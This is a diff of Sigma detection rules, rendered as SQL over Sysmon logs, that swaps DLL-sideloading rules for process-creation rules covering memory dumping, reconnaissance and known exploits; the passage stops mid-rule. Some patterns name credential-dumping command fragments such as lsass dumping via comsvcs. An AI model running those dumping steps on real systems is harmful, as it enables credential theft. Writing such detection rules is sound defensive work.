Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "status": "experimental", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", + "attack.t1036", "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "Web Browsers DLL Sideloading", - "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "title": "Service Reconnaissance Via Wmic.EXE", + "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "author": "frack113, Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" ], - "filename": "image_load_side_load_web_browsers.yml" + "filename": "proc_creation_win_wmic_recon_service.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "status": "test", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Diantz Download and Compress Into a CAB File", + "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "status": "experimental", + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1204.002" + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1012", + "attack.t1007" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_reg_query_registry.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "status": "experimental", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.privilege_escalation", + 
"attack.t1548.002" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', 
'3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", - "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "title": "Ruby Inline Command Execution", + "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "status": "experimental", + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_ruby_inline_command_execution.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": 
"a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Schtasks Schedule Type With High Privileges", + "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "status": "experimental", + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_schtasks_schedule_type_system.yml" }, { - "title": "Potential DLL Sideloading Via JsSchHlp", - "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "title": "Modify Group Policy Settings", + "id": 
"ada4b0c4-758b-46ac-9033-9004613a150d", "status": "experimental", - "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1484.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_jsschhlp.yml" + "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "title": "Whoami Utility Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unlikely" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_whoami_execution.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1202" ], "falsepositives": [ - "Unlikely" 
+ "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" - ], - "filename": "image_load_side_load_office_dlls.yml" - }, - { - "title": "PowerShell Core DLL Loaded By Non PowerShell Process", - "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "status": "experimental", - "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", - "tags": [ - "attack.t1059.001", - "attack.execution" - ], - "falsepositives": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR Image LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR Image LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR Image LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_system_management_automation_susp_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command 
